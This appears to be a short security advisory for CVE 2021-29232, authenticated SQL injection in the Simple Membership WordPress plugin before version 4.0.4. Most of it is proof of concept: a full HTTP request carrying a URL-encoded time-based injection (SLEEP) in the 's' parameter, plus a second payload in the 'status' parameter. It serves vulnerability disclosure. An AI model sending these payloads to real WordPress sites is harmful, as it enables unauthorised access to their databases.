Simple Membership < 4.0.4 – Authenticated SQL Injections | CVE 2021-29232

Description

The plugin did not properly sanitise user input before using it in SQL queries in the admin backend, leading to authenticated (admin+) SQL injections

Proof of Concept

GET /wp/wp-admin/admin.php?status=&membership_level=&s=hhhh%27%20OR%20SLEEP%281%29%20OR%20first_name%20LIKE%20%27%25i%0A&page=simple_wp_membership HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-admin/admin.php?page=simple_wp_membership
Connection: keep-alive
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

In addition to the 's' parameter, the 'status' parameter is similarly vulnerable:

GET /wp/wp-admin/admin.php?status=active%27%20AND%20SLEEP%288%29%20AND%20%27a%27%3D%27a&membership_level=&s=&page=simple_wp_membership